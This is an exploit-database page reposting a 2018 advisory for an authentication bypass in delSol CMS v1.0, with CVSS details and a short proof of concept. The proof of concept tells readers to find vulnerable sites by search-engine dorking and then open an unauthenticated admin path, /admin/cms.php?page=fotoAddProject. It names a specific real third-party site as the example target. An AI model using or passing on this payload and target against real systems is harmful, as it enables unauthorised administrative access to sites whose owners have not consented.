Advertisement






delSol CMS v1.0 Unauthorised Administrative Access Vulnerability

CVE Category Price Severity
CWE-287 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2018-07-16
CVSS EPSS EPSSP
CVSS: 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070159

Below is a copy:

delSol CMS v1.0 Unauthorised Administrative Access Vulnerability
====================================================================================================================================
| # Title     : delSol CMS v1.0 Unauthorised Administrative Access Vulnerability                                                   |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro)                                                                                        |
| # Vendor    : https://codecanyon.net/                                                                                            |  
| # Dork      : n/a                                                                                                                |
====================================================================================================================================


poc :

[+] Dorking n Google Or Other Search Enggine 

[+] use payload : /admin/cms.php?page=fotoAddProject

[+] http://www.cobbaert-luc.be/admin/cms.php?page=fotoAddProject

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum